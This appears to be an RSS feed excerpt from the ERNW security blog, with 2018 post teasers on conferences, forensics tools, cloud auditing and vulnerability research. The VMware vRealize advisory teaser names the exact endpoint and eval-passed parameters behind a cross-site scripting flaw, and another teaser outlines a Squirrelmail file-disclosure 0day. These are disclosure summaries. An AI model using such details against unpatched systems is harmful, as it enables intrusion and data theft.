      <description>&lt;p&gt;When I recently joined the Windows Security team at ERNW, Enno asked me if I wanted to write a ‘welcome’ blogpost on a topic of my choosing… Up for the challenge, and since I had been playing with BloodHound &amp;amp; Cypher for the last couple of months, I first thought I would do something on that topic.&lt;/p&gt;&#xA;&lt;p&gt;However, after gathering my thoughts and some Cypher I had collected here and there, I realized that the topic of Bloodhound Cypher might actually require several blog posts… And so I changed my mind. I will keep the joys of Cypher for later, and in this post, I will talk about a tiny tool I wrote to query the Mitre ATT&amp;amp;CK™ knowledge base from the comfort of a PowerShell prompt.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The building IoT 2018 in Cologne</title>
      <link>https://insinuator.net/2018/06/the-building-iot-2018-in-cologne/</link>
      <pubDate>Mon, 18 Jun 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/06/the-building-iot-2018-in-cologne/</guid>
      <description>&lt;p&gt;In Mai 2018, Tobias and me were in Cologne at the Building IoT conference. The topics of the talks covered a broad spectrum of the Internet of Things field. There were three tracks covering different topics ranging from the jungle of IoT protocols, secure Linux hypervisors specially developed for IoT modules to machine learning and blockchain.&lt;/p&gt;&#xA;&lt;p&gt;In “How to secure over the air updates” the speaker showed how to securely deploy updates over the standard communication channel to the target device. Many consumer IoT devices have a short support for updates if they get any updates at all. This leads and in the future will lead to bad news like botnets, bricked devices and exploited IP cameras streaming publicly. Therefore, a patch and vulnerability management is required – especially in industrial Internet of Things devices. Some updates have to be performed over the air due to the physical inaccessibility of some IoT devices in production environments. There are two possibilities to update such systems: First, a rescue OS (Operating System) boots and overwrites the existing production OS. The second option is a redundant OS, which copies the updates to the inactive OS and reboots to that.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Modern Application Stacks &amp; Security</title>
      <link>https://insinuator.net/2018/06/modern-application-stacks-security/</link>
      <pubDate>Fri, 15 Jun 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/06/modern-application-stacks-security/</guid>
      <description>&lt;p&gt;I had the pleasure to give a presentation at the &lt;a href=&#34;https://www.sig-switzerland.ch/conference/sigs-technology-conference/&#34;&gt;Security Interest Group Switzerland Technology Conference&lt;/a&gt; about modern application stacks and how they can be used to improve infrastructure and application security posture – the slides can be found &lt;a href=&#34;https://ernw.de/download/ERNW_SIG_Cloud_ModernAppStackSecurity_mluft.pdf&#34;&gt;here&lt;/a&gt;. Besides seeing a lot of &lt;a href=&#34;https://twitter.com/ioshints&#34;&gt;old friends&lt;/a&gt;, I particularly enjoyed a round table discussion on security integration into CI/CD pipelines. There was a relevant exchange on approaches that actually work and were tested in environments beyond just recommending some container scanner (product). One participant had an interesting case study on how they enabled developers to maintain WAF policies in configuration files in their code repository including automated deployment to the WAF. He also emphasized that the environments with actual security benefits resulted from a close cooperation between development and security team (were domain knowledge was combined 😉 ).&lt;/p&gt;</description>
    </item>
    <item>
      <title>New Release of Glibc Heap Analysis Plugins</title>
      <link>https://insinuator.net/2018/06/new-release-of-glibc-heap-analysis-plugins/</link>
      <pubDate>Wed, 06 Jun 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/06/new-release-of-glibc-heap-analysis-plugins/</guid>
      <description>&lt;p&gt;After quite some time and work, I’m happy to announce the new release of the &lt;a href=&#34;https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/linux/heap_analysis.py&#34;&gt;Linux&lt;/a&gt; &lt;a href=&#34;https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/linux/keepassx.py&#34;&gt;Heap&lt;/a&gt; &lt;a href=&#34;https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/linux/zsh.py&#34;&gt;Analysis&lt;/a&gt; Plugins, which are now part of the &lt;a href=&#34;https://github.com/google/rekall&#34;&gt;Rekall&lt;/a&gt; project, but not yet part of an official Rekall release, so you have to grab them manually.&lt;br&gt;&#xA;This release fixes several bugs and adds the following features:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Support for Glibc version 2.26 (tcache chunks) and 2.27&lt;/li&gt;&#xA;&lt;li&gt;Heapsearch now includes Rekall’s yara scan functionality&lt;/li&gt;&#xA;&lt;li&gt;x86 Glibc versions with a modified MALLOC_ALIGNMENT value of 16 (as done in arch’s glibc package 2.26) are now supported&lt;/li&gt;&#xA;&lt;li&gt;Improved retrieval of main_arena and new automated retrieval of malloc_par struct; so for the majority of cases, the corresponding cmd line options are not necessary anymore and hence no debug information have to be retrieved.&lt;/li&gt;&#xA;&lt;li&gt;main_arena and malloc_par struct retrieval now also applies for statically linked binaries; there might however be cases, where it is necessary to specify the malloc_par struct offset and the used glibc version number&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;While Glibc version 2.27 does not really change much for the heap from a forensics point of view, version 2.26 introduced a new feature called tcache (per thread cache). Those caches are essentially just a new type of bin, holding freed chunks, but &lt;a href=&#34;https://sourceware.org/ml/libc-alpha/2017-01/msg00452.html&#34;&gt;seem to improve the performance&lt;/a&gt;.&lt;br&gt;&#xA;Sadly, only two days after its &lt;a href=&#34;https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc&#34;&gt;first commit&lt;/a&gt;, there was already a &lt;a href=&#34;http://tukan.farm/2017/07/08/tcache/&#34;&gt;blog post&lt;/a&gt; explaining the functionality (not so sad 😉 ) and also some discovered vulnerabilities (here we go with the sad part).&lt;br&gt;&#xA;Besides introducing a new landscape for attackers, this feature added two new heap management structs and one additional chunk per thread-heap (each thread has its own heap, up until an upper limit). This chunk is located at the beginning of each heap and hence, part of a raw heap dump (so be aware of that, if you are doing a raw analysis without the plugins).&lt;br&gt;&#xA;The chunk holds the content of the &lt;code&gt;tcache_perthread_struct&lt;/code&gt;, which has to members:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security of Busch-Jaeger IP Gateway</title>
      <link>https://insinuator.net/2018/05/security-of-busch-jaeger-ip-gateway/</link>
      <pubDate>Wed, 16 May 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/05/security-of-busch-jaeger-ip-gateway/</guid>
      <description>&lt;p&gt;IoT is everywhere right now and there are a lot of products out there. I have been looking at an IP Gateway lately and found some serious issues. The &lt;a href=&#34;https://www.busch-jaeger.de/en/products/systems/door-communication/abb-welcome-ip-gateway-app-and-myabb-livingspace/&#34;&gt;Busch-Welcome IP-Gateway from Busch-Jaeger&lt;/a&gt; is one of the devices that bridges the gap between sensors and actors in your smart home and the network/Internet. It enables the communication to a door control system that implements various smart home functions. The device itself is offering an HTTP service to configure it, which is protected by a username and password. Some folks even actually expose the device and its login to the Internet. I tried to configure one of these lately and stumbled upon some security issues that I would like to discuss in this blog post.&lt;/p&gt;</description>
    </item>
    <item>
      <title>GI Sicherheit 2018 Conference</title>
      <link>https://insinuator.net/2018/05/gi-sicherheit-2018-conference/</link>
      <pubDate>Thu, 03 May 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/05/gi-sicherheit-2018-conference/</guid>
      <description>&lt;p&gt;Last week (25^(th) – 27^(th) April), I attended the “Sicherheit 2018” in Konstanz which is the annual meeting of the security community of the Gesellschaft für Informatik e.V. (GI) in Germany. The conference is in equal proportions attended by researchers and people of the industry working in security-related disciplines which lead to lively and pleasant discussions conversations.&lt;/p&gt;&#xA;&lt;p&gt;The topics discussed were contentual wide-reaching, so there were very technical talks like Sebastian Banescu who was the winner and one of two candidates nominated for the best PhD thesis award presenting about “Characterizing the Strength of Software Obfuscation Against Automated Attacks”, as well as conceptual presentations such as Sabrina Krausz elucidated her bachelor thesis about an integrated procedure model for planning and implementing an ISMS on the example of the pharmaceutical production.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS18 Photos online!</title>
      <link>https://insinuator.net/2018/05/troopers18-photos-online/</link>
      <pubDate>Thu, 03 May 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/05/troopers18-photos-online/</guid>
      <description>&lt;p&gt;We are very excited to publish some (more to come!) of our photos from &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;TROOPERS18&lt;/a&gt;! Based on feedback from #TR18 we would also like to take a moment for our official TROOPERS photographer to introduce himself and tell you a little about what inspires him.&lt;/p&gt;&#xA;&lt;p&gt;Peter Walter is a 37 year old photographer based in Germany near Stuttgart. For many years now he is the official TROOPERS photographer and very proud to be part of the Troopers family.&lt;/p&gt;</description>
    </item>
    <item>
      <title>printf(“Hello World!”) Part 2</title>
      <link>https://insinuator.net/2018/04/printfhello-world-part-2/</link>
      <pubDate>Mon, 30 Apr 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/04/printfhello-world-part-2/</guid>
      <description>&lt;p&gt;As our journey to the new product continues we are facing the typical challenges of phase 2 in the software development life cycle, the design phase (see &lt;a href=&#34;https://insinuator.net/2018/02/printfhello-world/&#34;&gt;part 1&lt;/a&gt; for the overview of the phases):&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;2.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;h3 id=&#34;design-and-components&#34;&gt;Design and Components&lt;/h3&gt;&#xA;&lt;p&gt;The new tool will deal with Active Directory security so it has to integrate into large scale Windows based customer environments, which in turn makes the decision about the components quite easy ;-). We have chosen .NET as our primary development platform including key components from Microsoft to run our application, these components include the IIS and Microsoft SQL Express/Server and of course one Windows Server.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reversing and Patching .NET Binaries with Embedded References</title>
      <link>https://insinuator.net/2018/04/reversing-and-patching-.net-binaries-with-embedded-references/</link>
      <pubDate>Mon, 30 Apr 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/04/reversing-and-patching-.net-binaries-with-embedded-references/</guid>
      <description>&lt;p&gt;Lately I’ve been analyzing a .NET binary that was quite interesting. It was a portable binary that shipped without any third-party dependencies. I started looking at the .NET assembly with ILSpy and noticed that there was not that much code that ILSpy found and there were a lot of references to classes/methods that were neither in the classes identified by ILSpy nor were they part of the .NET framework.&lt;/p&gt;&#xA;&lt;p&gt;At some point I was going through everything that ILSpy displayed about the binary, including the resources which were looking very interesting:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Industrial IoT Overview &amp; Case Studies</title>
      <link>https://insinuator.net/2018/04/industrial-iot-overview-case-studies/</link>
      <pubDate>Wed, 25 Apr 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/04/industrial-iot-overview-case-studies/</guid>
      <description>&lt;p&gt;Stefan and I had the pleasure of joining a one-day closed workshop on Industrial IoT Security. As always, we ended up with plenty of new research ideas and great contacts. We hope of course to post on follow-up research, but in this short post we quickly want to publish our slides which contain our input for the workshop. We mainly presented on IT security challenges for modern IIoT environments and presented some case studies for successful hardening/protection of IIoT environments as well as security in IIoT product development.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Yet Another Information Disclosure?</title>
      <link>https://insinuator.net/2018/04/yet-another-information-disclosure/</link>
      <pubDate>Tue, 24 Apr 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/04/yet-another-information-disclosure/</guid>
      <description>&lt;p&gt;Hey there, for those of you that roll your eyes when writing the nth Information Disclosure Finding in a report, here is a short story of how such information helped compromising a system.&lt;/p&gt;&#xA;&lt;p&gt;In a recent penetration we found a hidden debug page which disclosed information about internal parameters. Along with database connection strings and key material there was a username and a user home parameter disclosed on said debug page.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisory for VMware vRealize Automation Center</title>
      <link>https://insinuator.net/2018/04/security-advisory-for-vmware-vrealize-automation-center/</link>
      <pubDate>Fri, 13 Apr 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/04/security-advisory-for-vmware-vrealize-automation-center/</guid>
      <description>&lt;p&gt;During a recent customer project we identified several vulnerabilities in the VMware vRealize Automation Center such as a DOM-based cross-site scripting and a missing renewal of session tokens during the login. The vulnerabilities have been disclosed to VMware on November 20th, 2017. A security advisory for the vulnerabilities has been made available &lt;a href=&#34;https://www.vmware.com/security/advisories/VMSA-2018-0009.html&#34;&gt;here&lt;/a&gt; on April 12th, 2018.&lt;/p&gt;&#xA;&lt;p&gt;Just a few words regarding the cross-site scripting vulnerability. This vulnerability is present within a GET request to the URL &lt;em&gt;/vcac/gadgets/ifr&lt;/em&gt; because of certain URL parameters whose values are directly passed to an &lt;em&gt;eval&lt;/em&gt; function call. The vulnerable parameters are &lt;em&gt;gwt:onLoadErrorFn&lt;/em&gt; and &lt;em&gt;gwt:onPropertyErrorFn&lt;/em&gt;. It seems that these parameters are actually never used by the application and we only found them by looking at the source code.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 Attack &amp; Research Summaries</title>
      <link>https://insinuator.net/2018/03/%23tr18-attack-research-summaries/</link>
      <pubDate>Fri, 23 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/%23tr18-attack-research-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;TROOPERS18&lt;/a&gt; Attack &amp;amp; Research Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;reverse-engineering-blackbox-systems-with-greatfet--facedancer-by-kate-temkin-and-dominic-spill&#34;&gt;Reverse Engineering Blackbox Systems with GreatFET &amp;amp; Facedancer by Kate Temkin and Dominic Spill&lt;/h1&gt;&#xA;&lt;p&gt;USB is everywhere, your phone, gaming consoles, IoT waffle irons, you name it. Due to its’ widespread use in everyday life it is typically trusted by the user. And even if one wanted to find out what’s happening behind the scenes, surely digging into USB communication is too much of a chore to be worth the hassle, right? This talk by Kate Temkin and Dominic Spill are about to prove that very wrong with an impressive display of their tools &lt;a href=&#34;https://greatscottgadgets.com/greatfet/&#34;&gt;GreatFET&lt;/a&gt; and &lt;a href=&#34;https://github.com/ktemkin/Facedancer&#34;&gt;Facedancer&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 Defense &amp; Management Summaries</title>
      <link>https://insinuator.net/2018/03/%23tr18-defense-management-summaries/</link>
      <pubDate>Fri, 23 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/%23tr18-defense-management-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;TROOPERS18&lt;/a&gt; Defense &amp;amp; Management Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;all-your-cloud-are-belong-to-us&#34;&gt;All Your Cloud Are Belong to Us&lt;/h1&gt;&#xA;&lt;p&gt;The talk “All Your Cloud Belong Are Belong to Us” was held by &lt;a href=&#34;https://twitter.com/dk_effect&#34;&gt;Nate Warfield&lt;/a&gt;, who is a Senior Security Program Manager for the Microsoft Security Response Center (MSRC).&lt;br&gt;&#xA;Before Microsoft he worked as a network engineer about 18 years and 10 of this for a large amount of cell phone companies.&lt;br&gt;&#xA;Nate gives an overview about the state of the cloud solution provided by Microsoft, Azure, and how he hunts vulnerabilities in this environment.&lt;br&gt;&#xA;Finally he concludes that the giving up your infrastructure to the cloud doesn’t mean that you give up your responsibility.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 Next Generation Internet (NGI) Summaries</title>
      <link>https://insinuator.net/2018/03/%23tr18-next-generation-internet-ngi-summaries/</link>
      <pubDate>Fri, 23 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/%23tr18-next-generation-internet-ngi-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;TROOPERS18&lt;/a&gt; Next Generation Internet Event.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;h1 id=&#34;ngi-keynote-by-graeme-neilson&#34;&gt;NGI Keynote by &lt;a href=&#34;https://www.troopers.de/events/speaker/7_graeme_neilson/&#34;&gt;Graeme Neilson&lt;/a&gt;&lt;/h1&gt;&#xA;&lt;p&gt;Before his infosec career Graeme was a street performer, then security researcher, now he calls himself a defender. The talk was built around the following sentence: “The infosec industry and community have completely failed to create meaningful change in the behavior of people”.&lt;/p&gt;&#xA;&lt;p&gt;The following example is a resume of how hacking worked from 1988 to 2017:&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 SAP Security Summaries</title>
      <link>https://insinuator.net/2018/03/%23tr18-sap-security-summaries/</link>
      <pubDate>Fri, 23 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/%23tr18-sap-security-summaries/</guid>
      <description>&lt;p&gt;This blogpost contains summaries of talks from this year’s &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;TROOPERS18&lt;/a&gt; SAP Security Track.&lt;/p&gt;&#xA;&lt;h1 id=&#34;sap-igs--the-vulnerable-forgotten-component-by-yvan-genuer&#34;&gt;SAP IGS : The ‘vulnerable’ forgotten component by Yvan Genuer&lt;/h1&gt;&#xA;&lt;p&gt;The Internet Graphics Server (IGS) is used to generate Web Based graphics from the SAP Web AS. Yvan Genuer looked at the security of an ancient component with very few public vulnerabilities available so far. In his talk he gave us insights on the structure of the IGS, its services, and problems he had when looking for documentation of the IGS and its components.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR18 Active Directory Security Track, Part 1</title>
      <link>https://insinuator.net/2018/03/%23tr18-active-directory-security-track-part-1/</link>
      <pubDate>Thu, 22 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/%23tr18-active-directory-security-track-part-1/</guid>
      <description>&lt;p&gt;This is the first post discussing talks of the &lt;em&gt;Active Directory Security Track&lt;/em&gt; of &lt;a href=&#34;https://www.troopers.de/troopers18/&#34;&gt;this year’s Troopers&lt;/a&gt; which took place last week in Heidelberg (like in the last nine years ;-). It featured, amongst others, a new track focused on Microsoft AD and its security properties &amp;amp; implications. &lt;a href=&#34;https://www.troopers.de/troopers18/agenda/#agenda-day--2018-03-15&#34;&gt;This&lt;/a&gt; was the agenda.&lt;/p&gt;&#xA;&lt;p&gt;The idea for this special track was born out of two considerations:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;we had noted there’s a lot of stuff going on in the space, both on the offense and on the defense side. And in pretty much every incident analysis &amp;amp; response project we were brought in recently Active Directory played a huge role…&lt;/li&gt;&#xA;&lt;li&gt;already in the early phase of the CfP several interesting submissions came in (maybe due to the fact that some big guns of the field had voiced &lt;a href=&#34;https://twitter.com/mattifestation/status/906180147203645440&#34;&gt;very&lt;/a&gt; &lt;a href=&#34;https://twitter.com/christruncer/status/845321214788849666&#34;&gt;kind&lt;/a&gt; &lt;a href=&#34;https://twitter.com/harmj0y/status/710229755795144704&#34;&gt;words&lt;/a&gt; &lt;a href=&#34;https://twitter.com/subTee/status/972191912277901312&#34;&gt;in&lt;/a&gt; &lt;a href=&#34;https://twitter.com/Cneelis/status/845321978089295872&#34;&gt;the&lt;/a&gt; &lt;a href=&#34;https://twitter.com/PyroTek3/status/918214609273868288&#34;&gt;past&lt;/a&gt;)… and creating an extra track simply relieved us from the burden to make a tough choice between those.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;As this was the first Troopers since its creation where I didn’t have any official roles and out of personal interest (in a very distant past I happened to be the co-author of the first German book on &lt;a href=&#34;https://www.amazon.de/Security-unter-Windows-NT-4/dp/3778526707/&#34;&gt;Windows NT4 Security&lt;/a&gt;)  I decided to spend the majority of conference day 2 in the AD track. In hindsight I’m tempted to say that the track was a huge success: brilliant talks, pretty much always a packed room, and quite good discussions after the talks. (yes, of course I’m biased, what makes you think that?).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Squirrelmail Full Disclosure – TROOPERS18</title>
      <link>https://insinuator.net/2018/03/squirrelmail-full-disclosure-troopers18/</link>
      <pubDate>Thu, 15 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/squirrelmail-full-disclosure-troopers18/</guid>
      <description>&lt;p&gt;Birk an me basically fully disclosed a 0day in &lt;a href=&#34;http://squirrelmail.org/&#34;&gt;Squirrelmail&lt;/a&gt; yesterday. This is a short Q&amp;amp;A to answer the most common questions about the issue to calm you all down a little bit. 😉&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;What is the punchline, what do I need to know?&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;An attacker able to exploit this vulnerability can extract files of the server the application is running on. This may include configuration files, log files and additionally all files that are readable for all users on the system. This issue is post-authentication. That means an attacker would need valid credentials for the application to log in or needs to exploit an additional vulnerability of which we are not aware of at this point of time.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Hackers‘ Sanctuary City</title>
      <link>https://insinuator.net/2018/03/the-hackers-sanctuary-city/</link>
      <pubDate>Wed, 14 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/the-hackers-sanctuary-city/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://youtu.be/wCMwTUS3k4c&#34;&gt;https://youtu.be/wCMwTUS3k4c&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://troopers.de&#34;&gt;&lt;strong&gt;TROOPERS&lt;/strong&gt;&lt;/a&gt; has a long history of theming the conference every year. Usually we pick a surreal topic, a fun story which we think is worth to pick up on. Some of it starts as a crazy thought, others have been the result of long discussions. Most of them are online, only our master piece from 2016 is securely stored in the company’s vaults.&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;fake_news.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;However, this year was different. Traveling across the globe, speaking at and attending other conferences, connecting with our peers and the community, we felt that 2017 was a particularly tough year for many of us, both professionally and personally. There was this doom and gloom baseline to it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Auditing AWS Environments</title>
      <link>https://insinuator.net/2018/03/auditing-aws-environments/</link>
      <pubDate>Wed, 07 Mar 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/03/auditing-aws-environments/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;Related to our new TROOPERS workshop &lt;a href=&#34;https://troopers.de/troopers18/trainings/jfc3gg/&#34;&gt;“Jump-Starting Public Cloud Security”&lt;/a&gt;, this post is going to describe some relevant components which need to be taken care of when constructing and auditing an Amazon Web Services (AWS) cloud environment. Those include amongst others the general AWS account structure, Identity and Access Management (IAM), Auditing and Logging (CloudTrail and CloudWatch), Virtual Private Cloud (VPC) networks, as well as S3 buckets.&lt;/p&gt;&#xA;&lt;p&gt;The AWS IAM service is responsible for identity and access management (surprise!). This includes managing user accounts, defining password policies, and – most importantly – creating, defining, and assigning groups and roles.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2018 – Talks Part2</title>
      <link>https://insinuator.net/2018/02/telcosecday-2018-talks-part2/</link>
      <pubDate>Mon, 26 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/telcosecday-2018-talks-part2/</guid>
      <description>&lt;p&gt;We have the next set of selected talks being announced here. I am super excited about the variety of applications we had this year. Here are some of the talks we will have.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Title: From LoRa technology to deployment within Orange affiliates&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;Speakers: Franck L’Hereec and  Albert Nguyen&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;Just deployed, the LoRa technology has already passed into the hands of hackers who have analyzed the LoRaWAN protocol as well as the objects and gateways that implement it. At Orange, Orange Labs’ security experts have therefore looked into those issues, first to understand it better, and also ensure the network’s deployment in optimal security conditions. Demonstration via the example of the treatment of the security of an innovation project by Orange. During the presentation we will present :&lt;/p&gt;</description>
    </item>
    <item>
      <title>Creating Static Binaries for Nmap, Socat and other Tools</title>
      <link>https://insinuator.net/2018/02/creating-static-binaries-for-nmap-socat-and-other-tools/</link>
      <pubDate>Fri, 23 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/creating-static-binaries-for-nmap-socat-and-other-tools/</guid>
      <description>&lt;p&gt;In various scenarios it might be helpful or even required to have a statically compiled version of Nmap available. This applies to e.g. scenarios where only limited user privileges are available and installing anything to the system might not be desirable.&lt;/p&gt;&#xA;&lt;p&gt;For such cases I’ve started to create recipes to build such binaries. Similar projects are already available on GitHub, but there are several reasons why I chose to create my own tools:&lt;/p&gt;</description>
    </item>
    <item>
      <title>printf(“Hello World!”)</title>
      <link>https://insinuator.net/2018/02/printfhello-world/</link>
      <pubDate>Fri, 23 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/printfhello-world/</guid>
      <description>&lt;p&gt;ERNW has a new baby, so please say “hello” to the new ERNW SecTools GmbH ;-).&lt;br&gt;&#xA;But why another ERNW company? Short answer: Because we want to contribute to changing the way how software is built today: insecure, focused on profit and sometimes made by people who ignore lessons from history. So how can we contribute in this space? Start changing it ;-).&lt;/p&gt;&#xA;&lt;p&gt;Confucius said: “The man who moves a mountain begins by carrying away small stones” and that’s our way to go. It is not about building error free or unbreakable software, it is about changing the way how software is built today, about improving security and about raising the bar.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TLS in the Enterprise: Is Heartbleed still a Problem?</title>
      <link>https://insinuator.net/2018/02/tls-in-the-enterprise-is-heartbleed-still-a-problem/</link>
      <pubDate>Fri, 16 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/tls-in-the-enterprise-is-heartbleed-still-a-problem/</guid>
      <description>&lt;p&gt;Our new workshop about &lt;a href=&#34;https://troopers.de/troopers18/trainings/9afapk/&#34;&gt;TLS/SSL in the enterprise&lt;/a&gt; will be held for the 1st time at Troopers 2018. So I would like to take the opportunity and post a short teaser about stuff we will cover in this workshop.&lt;/p&gt;&#xA;&lt;p&gt;TLS/SSL is a complicated topic especially in enterprise environments due to the fact, that&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;encrypted traffic should be inspected e.g. for malware&lt;/li&gt;&#xA;&lt;li&gt;customers/users must be able to use important applications&lt;/li&gt;&#xA;&lt;li&gt;crypto attacks are complex and sometimes considered to be only a problem in theory&lt;/li&gt;&#xA;&lt;li&gt;the internal CERT wants to have every issue fixed, if feasible or not 😉&lt;/li&gt;&#xA;&lt;li&gt;impact of configuration changes can not be foreseen&lt;/li&gt;&#xA;&lt;li&gt;Software inventory is incomplete (do you want to make a bet that Heartbleed is fixed completely in your environment ;-)? )&lt;/li&gt;&#xA;&lt;li&gt;… and so forth&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;In the workshop we will cover all these points, discuss them and share our experience regarding feasibility and useful mitigating controls. We will explain the most common SSL vulnerabilities/attacks, demonstrate tools to test (and sometimes to exploit) them, point out pitfalls and recommend what to do. Let us have a look at one example, Heartbleed:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Extracting data from an EMV (Chip-And-Pin) Card with NFC technology</title>
      <link>https://insinuator.net/2018/02/extracting-data-from-an-emv-chip-and-pin-card-with-nfc-technology/</link>
      <pubDate>Thu, 15 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/extracting-data-from-an-emv-chip-and-pin-card-with-nfc-technology/</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a guest blog post by Salvador Mendoza.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;During years, many different researches and attacks against digital and physical payment methods have been discussed. New security techniques and methodologies such as tokenization process attempts to reduce or prevent fraudulent transactions.&lt;/p&gt;&#xA;&lt;p&gt;Extracting or capturing data from a transaction have been studied in different ways, and some of the most common techniques are skimming, wireless skimming, &lt;a href=&#34;https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Haoqi-Shan-and-Jian-Yuan-Man-in-the-NFC.pdf&#34;&gt;relay attacks&lt;/a&gt;, traffic sniffing or &lt;a href=&#34;https://www.cl.cam.ac.uk/research/security/banking/relay/&#34;&gt;modifying a PoS(Point of Sale)&lt;/a&gt; system. In our talk, “&lt;a href=&#34;https://www.troopers.de/troopers18/agenda/tr18-nfc-payments/&#34;&gt;NFC Payments: The Art of Relay &amp;amp; Replay Attacks&lt;/a&gt;” at &lt;a href=&#34;https://www.troopers.de/&#34;&gt;TROOPERS18&lt;/a&gt;, we will discuss a new technique and methodology that malicious individuals could implement to extract data.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Get your hands dirty playing with RFID/NFC</title>
      <link>https://insinuator.net/2018/02/get-your-hands-dirty-playing-with-rfid/nfc/</link>
      <pubDate>Wed, 14 Feb 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/02/get-your-hands-dirty-playing-with-rfid/nfc/</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a guest blog post by Nahuel Grisolia.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;The first time I’ve heard about RFID was at high school, back in 2002, when I was studying Electronics. Back in that time, this technology was like some sort of black magic to me. A few years later in 2011, our government in Argentina decided to implement a “new technology” called NFC, designed as the new and only way of payment for the use of public transport. So, I decided to understand it better, play with it, and try some hacks I heard from the cool people of the CCC.&lt;/p&gt;</description>
    </item>
    <item>
      <title>White Paper on Incident Analysis and Forensics in Docker Environments</title>
      <link>https://insinuator.net/2018/02/white-paper-on-incident-analysis-and-forensics-in-docker-environments/</link>
